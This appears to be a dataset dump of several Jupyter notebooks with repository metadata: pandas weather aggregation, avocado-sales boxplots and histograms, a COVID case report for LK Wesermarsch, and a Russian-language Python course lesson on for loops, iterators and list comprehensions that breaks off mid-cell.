"# The average weather for each city\nmeans = weather.groupby('city')['temperature', 'humidity', 'wind_speed'].mean()\n\nmeans.columns = ['mean_temperature', 'mean_humidity', 'mean_speed']\nmeans.sample(10)",
"_____no_output_____"
]
],
[
[
"Note the two-levels of the columns above. Let us now flatten the data:\n",
"_____no_output_____"
]
],
[
[
"means = means.reset_index()\nmeans.head()",
"_____no_output_____"
]
],
[
[
"Now, let's join it back with the original data\n",
"_____no_output_____"
]
],
[
[
"means.sample(10)",
"_____no_output_____"
],
[
"df = means.set_index('city')",
"_____no_output_____"
]
],
[
[
"Therefore, now we can remove the unnecessary column city.",
"_____no_output_____"
]
],
[
[
"means_data = means.drop(['city'], axis=1)\nmeans_data.sample(10)",
"_____no_output_____"
],
[
"cor = means_data.corr()\ncor",
"_____no_output_____"
],
[
"data = weather.merge(means, left_on='city', right_on='city')",
"_____no_output_____"
],
[
"data.sample(10)",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
]
] |
cb01bbd9a62eed5b33b88c6695ee8b426ec68472 | 113,371 | ipynb | Jupyter Notebook | avocador_boxplots_histogramas_mapa.ipynb | morrisshm/arte_de_analitica_mau | d8781afc360454a585f06c1eba8edabbd17cbf7e | [
"MIT"
] | 1 | 2020-10-27T14:14:05.000Z | 2020-10-27T14:14:05.000Z | avocador_boxplots_histogramas_mapa.ipynb | morrisshm/arte_de_analitica_mau | d8781afc360454a585f06c1eba8edabbd17cbf7e | [
"MIT"
] | null | null | null | avocador_boxplots_histogramas_mapa.ipynb | morrisshm/arte_de_analitica_mau | d8781afc360454a585f06c1eba8edabbd17cbf7e | [
"MIT"
] | null | null | null | 211.51306 | 28,960 | 0.901165 | [
[
[
"import pandas as pd\nimport matplotlib\nimport matplotlib.pyplot as plt \nimport numpy as np; np.random.seed(0)\nimport seaborn as sns\n\ndata = pd.read_csv(\"avocado.csv\")\npd.set_option('display.max_rows', 100)\nprint(data)\ndata.head()\ndata.tail()",
"_____no_output_____"
],
[
"#BoxPlot_Avocado\ncolumna_1 = data[\"Small Bags\"]\ncolumna_2 = data[\"Large Bags\"]\ncolumna_3 = data[\"XLarge Bags\"]\ncolumna_4 = data[\"Total Bags\"]\nmyData = [columna_1,columna_2,columna_3,columna_4]\nfig = plt.figure(figsize =(10, 7))\nax = fig.add_axes([0, 0, 1, 1]) \nbp = ax.boxplot(myData) \nplt.title(\"Bags Boxplot\") \nax.set_xticklabels(['Small Bags', 'Large Bags', \n 'XLarge Bags','Total Bags']) \n\nplt.show()",
"_____no_output_____"
],
[
"#Histograma Precios Promedio\nnp.random.seed(10**7) \nmu = 121 \nsigma = 21\nx = mu + sigma * np.random.randn(1000) \n \nnum_bins = 100\n \nn, bins, patches = plt.hist(data[\"AveragePrice\"], num_bins, \n density = 1, \n color ='purple', \n alpha = 0.7) \n \ny = ((1 / (np.sqrt(2 * np.pi) * sigma)) *\n np.exp(-0.5 * (1 / sigma * (bins - mu))**2)) \n \nplt.plot(bins, y, '--', color ='black') \n \nplt.xlabel('X-Axis') \nplt.ylabel('Y-Axis') \n \nplt.title('Precio Promedio', \n fontweight =\"bold\") \n \nplt.show() ",
"_____no_output_____"
],
[
"#Histograma de Volumen total\nnp.random.seed(10**7) \nmu = 121 \nsigma = 21\nx = mu + sigma * np.random.randn(1000) \n \nnum_bins = 100\n \nn, bins, patches = plt.hist(data[\"Total Volume\"], num_bins, \n density = 1, \n color ='red', \n alpha = 0.7) \n \ny = ((1 / (np.sqrt(2 * np.pi) * sigma)) *\n np.exp(-0.5 * (1 / sigma * (bins - mu))**2)) \n \nplt.plot(bins, y, '--', color ='orange') \n \nplt.xlabel('X-Axis') \nplt.ylabel('Y-Axis') \n \nplt.title('Volumen Total', \n fontweight =\"bold\")\n",
"_____no_output_____"
],
[
"#Histograma de Large Bags\nnp.random.seed(10**7) \nmu = 121 \nsigma = 21\nx = mu + sigma * np.random.randn(1000) \n \nnum_bins = 100\n \nn, bins, patches = plt.hist(data[\"Large Bags\"], num_bins, \n density = 3, \n color ='red', \n alpha = 0.7) \n \ny = ((1 / (np.sqrt(2 * np.pi) * sigma)) *\n np.exp(-0.5 * (1 / sigma * (bins - mu))**2)) \n \nplt.plot(bins, y, '--', color ='red') \n \nplt.xlabel('X-Axis') \nplt.ylabel('Y-Axis') \n \nplt.title('Bolsas Grandes', \n fontweight =\"bold\")",
"_____no_output_____"
],
[
"#Histograma de Small Bags\nnp.random.seed(10**7) \nmu = 121 \nsigma = 21\nx = mu + sigma * np.random.randn(1000) \n \nnum_bins = 100\n \nn, bins, patches = plt.hist(data[\"Small Bags\"], num_bins, \n density = 3, \n color ='blue', \n alpha = 0.7) \n \ny = ((1 / (np.sqrt(2 * np.pi) * sigma)) *\n np.exp(-0.5 * (1 / sigma * (bins - mu))**2)) \n \nplt.plot(bins, y, '--', color ='orange') \n \nplt.xlabel('X-Axis') \nplt.ylabel('Y-Axis') \n \nplt.title('Bolsas Pequeñas', \n fontweight =\"bold\")",
"_____no_output_____"
],
[
"#Histograma Bolsas Extra Grandes\nnp.random.seed(10**7) \nmu = 121 \nsigma = 21\nx = mu + sigma * np.random.randn(1000) \n \nnum_bins = 100\n \nn, bins, patches = plt.hist(data[\"XLarge Bags\"], num_bins, \n density = 3, \n color ='brown', \n alpha = 0.7) \n \ny = ((1 / (np.sqrt(2 * np.pi) * sigma)) *\n np.exp(-0.5 * (1 / sigma * (bins - mu))**2)) \n \nplt.plot(bins, y, '--', color ='brown') \n \nplt.xlabel('X-Axis') \nplt.ylabel('Y-Axis') \n \nplt.title('Bolsas Extra Grandes', \n fontweight =\"bold\")",
"_____no_output_____"
],
[
"np.random.seed(10**7) \nmu = 121 \nsigma = 21\nx = mu + sigma * np.random.randn(1000) \n \nnum_bins = 100\n \nn, bins, patches = plt.hist(data[\"Total Bags\"], num_bins, \n density = 3, \n color ='yellow', \n alpha = 0.7) \n \ny = ((1 / (np.sqrt(2 * np.pi) * sigma)) *\n np.exp(-0.5 * (1 / sigma * (bins - mu))**2)) \n \nplt.plot(bins, y, '--', color ='red') \n \nplt.xlabel('X-Axis') \nplt.ylabel('Y-Axis') \n \nplt.title('Bolsas Grandes', \n fontweight =\"bold\")",
"_____no_output_____"
],
[
"newdf = data.copy()\nnewdf = newdf.drop(['Date','type','year','region', 'XLarge Bags'], axis=1)\nprint(data.head())\n",
" Unnamed: 0 Date AveragePrice Total Volume 4046 4225 \\\n0 0 2015-12-27 1.33 64236.62 1036.74 54454.85 \n1 1 2015-12-20 1.35 54876.98 674.28 44638.81 \n2 2 2015-12-13 0.93 118220.22 794.70 109149.67 \n3 3 2015-12-06 1.08 78992.15 1132.00 71976.41 \n4 4 2015-11-29 1.28 51039.60 941.48 43838.39 \n\n 4770 Total Bags Small Bags Large Bags XLarge Bags type \\\n0 48.16 8696.87 8603.62 93.25 0.0 conventional \n1 58.33 9505.56 9408.07 97.49 0.0 conventional \n2 130.50 8145.35 8042.21 103.14 0.0 conventional \n3 72.58 5811.16 5677.40 133.76 0.0 conventional \n4 75.78 6183.95 5986.26 197.69 0.0 conventional \n\n year region \n0 2015 Albany \n1 2015 Albany \n2 2015 Albany \n3 2015 Albany \n4 2015 Albany \n"
],
[
"data.describe(include=np.object).transpose()\n",
"_____no_output_____"
],
[
"ax = sns.heatmap(data)",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb01bd6a220908b95af6d932ca7cd7b671f16ccb | 4,203 | ipynb | Jupyter Notebook | ipynb/Germany-Niedersachsen-LK-Wesermarsch.ipynb | RobertRosca/oscovida.github.io | d609949076e3f881e38ec674ecbf0887e9a2ec25 | [
"CC-BY-4.0"
] | null | null | null | ipynb/Germany-Niedersachsen-LK-Wesermarsch.ipynb | RobertRosca/oscovida.github.io | d609949076e3f881e38ec674ecbf0887e9a2ec25 | [
"CC-BY-4.0"
] | null | null | null | ipynb/Germany-Niedersachsen-LK-Wesermarsch.ipynb | RobertRosca/oscovida.github.io | d609949076e3f881e38ec674ecbf0887e9a2ec25 | [
"CC-BY-4.0"
] | null | null | null | 29.391608 | 190 | 0.519867 | [
[
[
"# Germany: LK Wesermarsch (Niedersachsen)\n\n* Homepage of project: https://oscovida.github.io\n* [Execute this Jupyter Notebook using myBinder](https://mybinder.org/v2/gh/oscovida/binder/master?filepath=ipynb/Germany-Niedersachsen-LK-Wesermarsch.ipynb)",
"_____no_output_____"
]
],
[
[
"import datetime\nimport time\n\nstart = datetime.datetime.now()\nprint(f\"Notebook executed on: {start.strftime('%d/%m/%Y %H:%M:%S%Z')} {time.tzname[time.daylight]}\")",
"_____no_output_____"
],
[
"%config InlineBackend.figure_formats = ['svg']\nfrom oscovida import *",
"_____no_output_____"
],
[
"overview(country=\"Germany\", subregion=\"LK Wesermarsch\");",
"_____no_output_____"
],
[
"# load the data\ncases, deaths, region_label = germany_get_region(landkreis=\"LK Wesermarsch\")\n\n# compose into one table\ntable = compose_dataframe_summary(cases, deaths)\n\n# show tables with up to 500 rows\npd.set_option(\"max_rows\", 500)\n\n# display the table\ntable",
"_____no_output_____"
]
],
[
[
"# Explore the data in your web browser\n\n- If you want to execute this notebook, [click here to use myBinder](https://mybinder.org/v2/gh/oscovida/binder/master?filepath=ipynb/Germany-Niedersachsen-LK-Wesermarsch.ipynb)\n- and wait (~1 to 2 minutes)\n- Then press SHIFT+RETURN to advance code cell to code cell\n- See http://jupyter.org for more details on how to use Jupyter Notebook",
"_____no_output_____"
],
[
"# Acknowledgements:\n\n- Johns Hopkins University provides data for countries\n- Robert Koch Institute provides data for within Germany\n- Open source and scientific computing community for the data tools\n- Github for hosting repository and html files\n- Project Jupyter for the Notebook and binder service\n- The H2020 project Photon and Neutron Open Science Cloud ([PaNOSC](https://www.panosc.eu/))\n\n--------------------",
"_____no_output_____"
]
],
[
[
"print(f\"Download of data from Johns Hopkins university: cases at {fetch_cases_last_execution()} and \"\n f\"deaths at {fetch_deaths_last_execution()}.\")",
"_____no_output_____"
],
[
"# to force a fresh download of data, run \"clear_cache()\"",
"_____no_output_____"
],
[
"print(f\"Notebook execution took: {datetime.datetime.now()-start}\")\n",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
]
] |
cb01be0c7a243246de0d154bc31cd72f929f2560 | 46,741 | ipynb | Jupyter Notebook | lect04_for/.ipynb_checkpoints/for-checkpoint.ipynb | pileyan/DPO_python_2022 | 693e79b16716ab2894845b7f927caf6cc51e9725 | [
"MIT"
] | 3 | 2022-02-19T17:20:33.000Z | 2022-03-02T11:35:56.000Z | lect04_for/.ipynb_checkpoints/for-checkpoint.ipynb | pileyan/DPO_python_2022 | 693e79b16716ab2894845b7f927caf6cc51e9725 | [
"MIT"
] | null | null | null | lect04_for/.ipynb_checkpoints/for-checkpoint.ipynb | pileyan/DPO_python_2022 | 693e79b16716ab2894845b7f927caf6cc51e9725 | [
"MIT"
] | 1 | 2022-02-23T19:25:13.000Z | 2022-02-23T19:25:13.000Z | 24.928533 | 954 | 0.513126 | [
[
[
"Центр непрерывного образования\n\n# Программа «Python для автоматизации и анализа данных»\n\nНеделя 3 - 1\n\n*Ян Пиле, НИУ ВШЭ* \n\n# Цикл for. Применение циклов к строкам, спискам, кортежам и словарям.",
"_____no_output_____"
],
[
"Циклы мы используем в тех случаях, когда нужно повторить что-нибудь n-ное количество раз. Например, у нас уже был цикл **While**",
"_____no_output_____"
]
],
[
[
"ss = {1,2,3}\nss.pop()",
"_____no_output_____"
],
[
"ss.pop()",
"_____no_output_____"
],
[
"i = 1\nwhile i<=10:\n print(i)\n i+=1",
"1\n2\n3\n4\n5\n6\n7\n8\n9\n10\n"
]
],
[
[
"Здесь мы проверяем условие *i <= 10* (оно выполнено, *i = 1*), заходим в цикл с *i = 1*, печатаем значение *i*, добавляем к нему 1 иииии... \\\nСнова проверяем условие *i <= 10* (оно выполнено, *i = 2*), заходим в цикл с *i = 2*, печатаем значение *i*, добавляем к нему 1 иииии... \\\nДелаем такие же действия, пока *i* не становится равным 11, тогда условие входа в цикл не выполняется, и цикл завершается",
"_____no_output_____"
],
[
"Как мы уже обсуждали, цикл *While* гипотетически может \"уходить в бесконечность\", если условие, которое проверяется на входе в цикл будет выполнено всегда, например **While True**. Такие зацикливания можно прерывать оператором **break**, НО, это надо использовать очень аккуратно",
"_____no_output_____"
]
],
[
[
"i = 1\nwhile True:\n print(i)\n i+=1\n if i==11:\n break",
"1\n2\n3\n4\n5\n6\n7\n8\n9\n10\n"
]
],
[
[
"### FOR",
"_____no_output_____"
],
[
"В Python цикл начинается с ключевого слова **for**, за которым следует произвольное имя переменной, которое будет хранить значения следующего объекта последовательности. Общий синтаксис **for...in** в python выглядит следующим образом:\n\n**for** <переменная> **in** <последовательность>:\n\n <действие> \n \n**else:**\n\n <действие>\n \nЭлементы “последовательности” перебираются один за другим “переменной” цикла; если быть точным, переменная указывает на элементы. Для каждого элемента выполняется “действие”.",
"_____no_output_____"
],
[
"<img src =\"https://d33wubrfki0l68.cloudfront.net/09c51b2f33c74a58ae5ae12689b2c5441e6f6bb4/83a52/wp-content/uploads/2017/06/forloop.png\" alt =\"Test picture\" style=\"width: 300px;\"/>",
"_____no_output_____"
],
[
"Вот пример простейшего цикла **for**",
"_____no_output_____"
]
],
[
[
"languages = [\"C\", \"C++\", \"Perl\", \"Python\"]\nfor x in languages:\n print(x)",
"C\nC++\nPerl\nPython\n"
]
],
[
[
"Элементы “последовательности” перебираются один за другим “переменной” цикла; \\\nесли быть точным, переменная указывает на элементы. Для каждого элемента выполняется “действие”.\\\nЗдесь в роли \"последовательности\" у нас список",
"_____no_output_____"
],
[
"### Итерируемый объект \n\n**Итерация** - это общий термин, который описывает процедуру взятия элементов чего-то по очереди.\n\nВ более общем смысле, это последовательность инструкций, которая повторяется определенное количество раз или до выполнения указанного условия.\n\n**Итерируемый объект** (iterable) - это объект, который способен возвращать элементы по одному(не обязательно по порядку). Кроме того, это объект, из которого можно получить итератор.\n\nПримеры итерируемых объектов:\n\n* все последовательности: список, строка, кортеж\n* словари и множества\n* файлы",
"_____no_output_____"
],
[
"**Итератор** (iterator) - это объект, который возвращает свои элементы по одному за раз.\n\nС точки зрения Python - это любой объект, у которого есть метод __next__. Этот метод возвращает следующий элемент, если он есть, или возвращает исключение **StopIteration**, когда элементы закончились.\n\nКроме того, итератор запоминает, на каком объекте он остановился в последнюю итерацию.",
"_____no_output_____"
],
[
"Сейчас сложновато: Наш цикл for проходит именно по итератору! Когда мы говорим:\n\nfor object in iterable:\n\n do something \n \nМы, на самом деле, вызываем метод итерируемого объекта , который возвращает итератор.\nТаким образом, создаем объект-итератор , по которому и бежит цикл for.\nДля того чтобы все это увидеть, есть функция iter() В качестве аргумента ей передается итерируемый объект (словарь, список, лист и т.д.) , а она возвращает соответствующий итератор.\n",
"_____no_output_____"
]
],
[
[
"s = {1,2,3,4,5}\nprint(type(s))\nprint(type(iter(s)))",
"<class 'set'>\n<class 'set_iterator'>\n"
],
[
"for i in iter(s):\n print(i)",
"1\n2\n3\n4\n5\n"
]
],
[
[
"Посмотрим на встроенную функцию next(). Она должна отдавать следующий элемент итератора. ",
"_____no_output_____"
]
],
[
[
"s = {1,2,3,4,5}\ns_iter = iter(s)\nprint(next(s_iter))\nprint(next(s_iter))\nprint(next(s_iter))",
"1\n2\n3\n"
]
],
[
[
"Отлично! мы по одному научились перебирать элементы из итерируемого объекта. Стоит отдельно остановиться на том, что цикл **for**, в Python, устроен несколько иначе, чем в большинстве других языков. Он больше похож на **for...each**, или же **for...of**.",
"_____no_output_____"
],
[
"Например, для Javascript проход по списку с выводом на печать всех его элементов выглядит так:",
"_____no_output_____"
]
],
[
[
"%%js\nlet numbers = [10, 12, 15, 18, 20];\nfor (let i = 0; i < numbers.length; i += 1) {\n console.log(numbers[i])\n}",
"_____no_output_____"
],
[
"l = [1,2,3,4,5]\nlist(map(str,l))",
"_____no_output_____"
]
],
[
[
"\nЕсли же, мы перепишем цикл **for** с помощью цикла **while**, используя индексы, то работать такой подход будет только с последовательностями:",
"_____no_output_____"
]
],
[
[
"list_of_numbers = [1,2,3]\nindex = 0\nwhile index < len(list_of_numbers):\n print(list_of_numbers[index])\n index += 1",
"1\n2\n3\n"
]
],
[
[
"А с итерируемыми объектами, последовательностями не являющимися, не будет (потому что в множестве к элементу по индексу не обращаются!):",
"_____no_output_____"
]
],
[
[
"set_of_numbers = {1,2,3}\nindex = 0 \nwhile index < len(set_of_numbers):\n print(set_of_numbers[index])\n index += 1",
"_____no_output_____"
]
],
[
[
"Ну если уж прям совсем никак без индексации, то к любому итерируемому объекту можно применить функцию enumerate(), \\\nкоторая, как следует из названия, коллекцию занумерует. Здесь мы наделали кортежей вида (индекс, элемент)",
"_____no_output_____"
]
],
[
[
"set_of_numbers = {1,2,3,4,5,6}\nfor i in enumerate(set_of_numbers):\n print(i)",
"(0, 1)\n(1, 2)\n(2, 3)\n(3, 4)\n(4, 5)\n(5, 6)\n"
]
],
[
[
"Чтобы выдавать это в человеческом виде, можно прямо после for сказать, что мы \"итерируемся\" по индексам и объектам. \\\nВыглядит это следующим образом:",
"_____no_output_____"
]
],
[
[
"set_of_numbers = [1,2,3]\nfor index, element in enumerate(set_of_numbers):\n print(index, element)",
"0 1\n1 2\n2 3\n"
]
],
[
[
"### Немного умных слов об итераторах\n\n**Протокол итератора**\n\nТеперь формализуем протокол итератора целиком:\n\n* Чтобы получить итератор мы должны передать функции iter итерируемый объект.\n* Далее мы передаём итератор функции next.\n* Когда элементы в итераторе закончились, порождается исключение StopIteration. (Пока представим себе исключения, как объект специального типа, который генерируется в момент ошибки или какого-то терминального события. Например, они появляются, когда мы пытаемся делить на ноль или когда что-то напутали с типами\n\n**Особенности**:\n\n* Любой объект, передаваемый функции iter без исключения TypeError — итерируемый объект.\n* Любой объект, передаваемый функции next без исключения TypeError — итератор.\n* Любой объект, передаваемый функции iter и возвращающий сам себя — итератор.\n\n**Плюсы итераторов:**\n\nИтераторы работают \"лениво\" (en. lazy). А это значит, что они не выполняют какой-либо работы, до тех пор, пока мы их об этом не попросим. А это классный функционал, потому что очень многие виды данных в память компьютера не помещаются, а \"ленивый\" итератор позволяет эти данные читать по кускам! Так, например, можно посчитать количество строк в текстовом файле на несколько гигабайт.\n\nТаким образом, мы можем оптимизировать потребление ресурсов ОЗУ и CPU, а так же создавать бесконечные последовательности.",
"_____no_output_____"
],
[
"<img src =\"https://files.realpython.com/media/t.ba63222d63f5.png\" alt =\"Test picture\" style=\"width: 300px;\"/>",
"_____no_output_____"
],
[
"\nНа самом деле мы уже попробовали использовать цикл **for** на множествах и на списках. \\\nТеперь давайте систематически разберемся, как for используется с разными коллекциями",
"_____no_output_____"
],
[
"### Списки, строки, множества и кортежи",
"_____no_output_____"
],
[
"В общем, по индексированным последовательностям мы уже ходить умеем. В списках и кортежах это проход по элементам(подряд)\\\nа в строках это проход по буквам(в порядке следования).",
"_____no_output_____"
]
],
[
[
"x = 'Take a look around'\nfor i in x:\n print(i)",
"T\na\nk\ne\n \na\n \nl\no\no\nk\n \na\nr\no\nu\nn\nd\n"
],
[
"# Здесь мы прошлись по элементам списка и посчитали их сумму\n# В цикл вошли с total = 0 и на каждом элементе добавляли к total значение элемента\nx = [1,2,3,4]\ntotal = 0\n\nfor i in x:\n total+=i\nprint(total)",
"10\n"
],
[
"# Здесь мы прошлись по элементам кортежа и посчитали сумму тех, которые делятся на 7 нацело\n# В цикл вошли с total = 0 и на каждом элементе добавляли к total значение элементов, удовлетворяющих условию\n\nx = (1,2,3,4,7,49,4,23,63,28,28)\ntotal = 0\n\nfor i in x:\n if i % 7 == 0:\n total+=i\nprint(total)",
"175\n"
],
[
"# Здесь мы преобразовали кортеж из предыдущей ячейки в множество и посчитали сумму четных элементов\n# В цикл вошли с total = 0 и на каждом элементе добавляли к total значение элементов, удовлетворяющих условию\nx_set = set(x)\ntotal = 0\n\nfor i in x_set:\n if i % 2 == 0:\n total+=i\nprint(total)\nprint(x_set)",
"34\n{1, 2, 3, 4, 7, 49, 23, 28, 63}\n"
]
],
[
[
"### Словари\n\nВ случае словарей итерация (по умолчанию) происходит по ключам",
"_____no_output_____"
]
],
[
[
"d = {'foo': 1, 'bar': 2, 'baz': 3}\nfor k in d:\n print(k)",
"foo\nbar\nbaz\n"
]
],
[
[
"Но по ключам можно вынимать и соответствующие значения",
"_____no_output_____"
]
],
[
[
"for k in d:\n print(d[k])",
"1\n2\n3\n"
]
],
[
[
"Также можно напрямую указать, по чему мы итерируемся: по ключам, по значениям или по кортежам ключ-значение\\\nПомните методы **.values()** , **.keys()** и **.items()** ?",
"_____no_output_____"
]
],
[
[
"print(d)\nfor v in d.values():\n print(v)",
"{'foo': 1, 'bar': 2, 'baz': 3}\n1\n2\n3\n"
],
[
"print(d)\nfor v in d.keys():\n print(v)",
"{'foo': 1, 'bar': 2, 'baz': 3}\nfoo\nbar\nbaz\n"
],
[
"print(d)\nfor v in d.items():\n print(v)",
"{'foo': 1, 'bar': 2, 'baz': 3}\n('foo', 1)\n('bar', 2)\n('baz', 3)\n"
]
],
[
[
"А еще можно \"распаковать\" эти кортежи-ключ значения (примерно так же, как мы сделали для **enumerate**)",
"_____no_output_____"
]
],
[
[
"d = {'foo': 1, 'bar': 2, 'baz': 3}\nfor k, v in d.items():\n print('k =', k, ', v =', v)",
"k = foo , v = 1\nk = bar , v = 2\nk = baz , v = 3\n"
]
],
[
[
"Перед тем, как начать решать какие-то задачи, остается упомянуть крайне полезную функцию **range()**. \\\nПростыми словами, **range()** позволяет вам генерировать ряд чисел в рамках заданного диапазона. В зависимости от того, как много аргументов вы передаете функции, вы можете решить, где этот ряд чисел начнется и закончится, а также насколько велика разница будет между двумя числами.",
"_____no_output_____"
],
[
"Есть три способа вызова **range()**:\n\n* **range(стоп)** берет один аргумент\n* **range(старт, стоп)** берет два аргумента\n* **range(старт, стоп, шаг)** берет три аргумента\n\nНа деле **range()** возвращает \"ленивый\" итерируемый объект (Да, сейчас что-то сложно). Понимать надо следующее:\\\n* По range() можно итерироваться (значит это итерируемый объект)\n* range() не держит все свои объекты в памяти, а достает их \"по требованию\" (прям как итератор!)\n* Но есть и ряд отличий, который делает range() похожим на последовательности (списки, кортежи и строки)",
"_____no_output_____"
]
],
[
[
"# Это как раз первый случай (мы вывели все целые числа ДО трех)\nfor i in range(3):\n print(i)",
"0\n1\n2\n"
],
[
"# Это второй случай (мы вывели все целые числа от 0 до 10 не включая правый конец)\nfor i in range(0, 10):\n print(i)",
"0\n1\n2\n3\n4\n5\n6\n7\n8\n9\n"
],
[
"# Ну а это третий случай (мы вывели все целые числа от 0 до 10 не включая правый конец с шагом 2)\n# То есть нулевое, второе, четвертое и т.д.\nfor i in range(0, 10, 2):\n print(i)",
"0\n2\n4\n6\n8\n"
]
],
[
[
"Шаг здесь может быть положительным или отрицательным числом, но не может быть нулем! Отрицательное число будет означать уменьшение аргумента, то есть:",
"_____no_output_____"
]
],
[
[
"for i in range(10, 0, -1):\n print(i)",
"10\n9\n8\n7\n6\n5\n4\n3\n2\n1\n"
]
],
[
[
"А теперь отличие от итераторов! У range можно обратиться к элементу или даже срезу (как в списках)",
"_____no_output_____"
]
],
[
[
"print(range(3)[1])",
"1\n"
],
[
"print(range(10)[2:5])",
"range(2, 5)\n"
]
],
[
[
"Немного истории: в Python 2 были функции **range** и **xrange**. Первая создавала список (прям настоящий список), а вторая - \\\nименно то, что теперь в Python 3 называется **range**",
"_____no_output_____"
],
[
"### Задача 1\nСчитайте с клавиатуры несколько чисел через пробел и выведите сумму их кубов\n\n**Вход:** 1 2 3 \\\n**Выход:** 36",
"_____no_output_____"
]
],
[
[
"# Решение\nnumbers = map(int,input().split()) \nx = 0\nfor i in numbers:\n x += i**2\nprint(x)",
"1 2 3 4 5 6\n91\n"
]
],
[
[
"### Задача 2\nСчитайте с клавиатуры две последовательности чисел через пробел и выведите список уникальных общих элементов этих двух последовательностей. Сделать это можно с помощью вложенного цикла for и, например, множеств.\n\n**Вход:** \n\n Последовательность 1: 1 2 3 \n \n Последовательность 2: 2,2,4,7,4,3 \n \n**Выход:** \n\n Общие элементы: [2,3]",
"_____no_output_____"
],
[
"Взяли и посчитали вложенными циклами",
"_____no_output_____"
]
],
[
[
"common = set()\n\nlist1 = list(map(int,input().split()))\nlist2 = list(map(int,input().split()))\n\nfor elem1 in list1:\n for elem2 in list2:\n if elem1 == elem2:\n common.add(elem1)\n break\n\nprint(common)",
"1 2 3 4 5\n2 2 3 3\n{2, 3}\n"
]
],
[
[
"Но можно было и без этого. Решать можно было в несколько строк с использованием функционала множеств",
"_____no_output_____"
]
],
[
[
"set1 = set(map(int,input().split()))\nset2 = set(map(int,input().split()))\nset1.intersection(set2)",
"1 2 2 2 2 3 4 6 4 \n3 7 6 3 2\n"
]
],
[
[
"### Задача 3\nДан список, содержащий строки, целые числа и числа с плавающей точкой. Разбить его на три списка так, чтобы в одном остались только строки, в другом - только целые числа, а в третьем - только числа с плавающей точкой. Заметьте, что при проверке типов название типа пишется без кавычек, например **int**.\n\n**Вход:** \n\n Список 1: [1, 2, 5.6, 7.5, 'Boo', 1, 'RocknRoll']\n \n**Выход:** \n\n Список 1: [1, 2, 1]\n Список 2: [5.6, 7.5]\n Список 3: ['Boo', 'RocknRoll']",
"_____no_output_____"
]
],
[
[
"#Решение\nlist1 = [1, 2, 5.6, 7.5, 'Boo', 1, 'RocknRoll']\n\nints, floats, strings = [], [], []\nfor i in list1:\n if type(i)==int:\n ints.append(i)\n elif type(i)==float:\n floats.append(i)\n else:\n strings.append(i)\nprint(ints)\nprint(floats)\nprint(strings)",
"[1, 2, 1]\n[5.6, 7.5]\n['Boo', 'RocknRoll']\n"
]
],
[
[
"### Генераторы списков и списковые включения. aka List Comprehensions\nЭтот элемент языка считается его \"визитной карточкой\". Это своего рода метод быстро создать новый список, не применяя цикл for. Пусть мы, к примеру, хотим создать список с числами от 0 до 20",
"_____no_output_____"
]
],
[
[
"a = []\nfor i in range(20):\n a.append(i)\na",
"_____no_output_____"
]
],
[
[
"Это же выражение можно записать с помощью спискового включения",
"_____no_output_____"
]
],
[
[
"a = [i for i in range(20)]\nprint(type(a))\nprint(a)",
"<class 'list'>\n[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19]\n"
]
],
[
[
"Что мы видим? Во-первых, на выходе такой конструкцими мы получили лист (конечно, это же СПИСКОВОЕ включение). А во-вторых, все написано в одну строчку и , кажется следует вот такой конструкции:\n\n**new_list** = [**expression** for **member** in **iterable**]\n\n1. **expression** какое либо вычисление, вызов метода или любое другое допустимое выражение, которое возвращает значение. В приведенном выше примере выражение i * i является квадратом значения члена.\n2. **member** является объектом или значением в списке или итерируемым объекте (iterable). В приведенном выше примере значением элемента является i.\n3. **iterable** список, множество, последовательность, генератор или любой другой объект, который может возвращать свои элементы по одному. В приведенном выше примере iterable является range(20).\n\nОдним из основных преимуществ использования является то, что это единственный инструмент, который вы можете использовать в самых разных ситуациях. В дополнение к созданию стандартного списка, списки могут также использоваться для отображения и фильтрации. Вам не нужно использовать разные подходы для каждого сценария. Например, можно в раздел **expression** поставить функцию str(), которая превратит каждый элемент исходного списка в строку.",
"_____no_output_____"
]
],
[
[
"lst = [1,2,3,4,5,45,67,8,765,854,76]\nx = [str(i) for i in lst]\nx",
"_____no_output_____"
]
],
[
[
"Но и это еще не все. В списковое включение можно добавить какое нибудь условие (как мы это делали с **if**). Выглядеть это будет так:\n\n new_list = [expression for member in iterable (if conditional)]\n\nРазберем на примере:",
"_____no_output_____"
]
],
[
[
"lst = [1,2,3,4,5,45,67,8,765,854,76]\nx = [i for i in lst if i%2 == 0] #Здесь я взял и включил в новый список только четные элементы\nx",
"_____no_output_____"
]
],
[
[
"Более того - не зря в условии написано iterable, а не list. Значит можно попробовать проделать что-то подобное с любыми другими итерируемыми объектами. с кортежами все точно должно получиться:",
"_____no_output_____"
]
],
[
[
"# Предложение\nsentence = '''The rocket, who was named Ted, came back \n from Mars because he missed his friends.'''\n\n# Гласные английского языка и пробел\nvowels = 'aeiou '\n\n# достанем в список все символы строки, которые не являются гласными и пробелом.\nconsonants = [i for i in sentence if i not in vowels]\nconsonants",
"_____no_output_____"
]
],
[
[
"А еще вот так можно было... Не зря же регулярные выражения проходили.",
"_____no_output_____"
]
],
[
[
"import re\nre.findall(r'[^aeiou ]',sentence)",
"_____no_output_____"
]
],
[
[
"Мы уже поняли, что можно поместить условие в конец оператора для простой фильтрации, но что, если хочется изменить значение элемента вместо его фильтрации? В этом случае полезно поместить условное выражение в начале выражения. Выглядит это вот так:\n\n new_list = [expression (if conditional) for member in iterable]\n\nС помощью этого шаблона можно, например, использовать условную логику для выбора из нескольких возможных вариантов вывода. Допустим, у вас есть список цен, можно заменить отрицательные цены (это могут быть какие-то ошибки логирования) на 0 и оставить положительные значения без изменений:",
"_____no_output_____"
]
],
[
[
